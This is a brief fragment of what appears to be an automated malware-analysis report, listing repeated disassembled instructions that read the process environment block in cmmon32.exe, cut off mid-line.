Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]	5_2_04D751BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]	5_2_04D751BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]	5_2_04D751BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D769A6 mov eax, dword p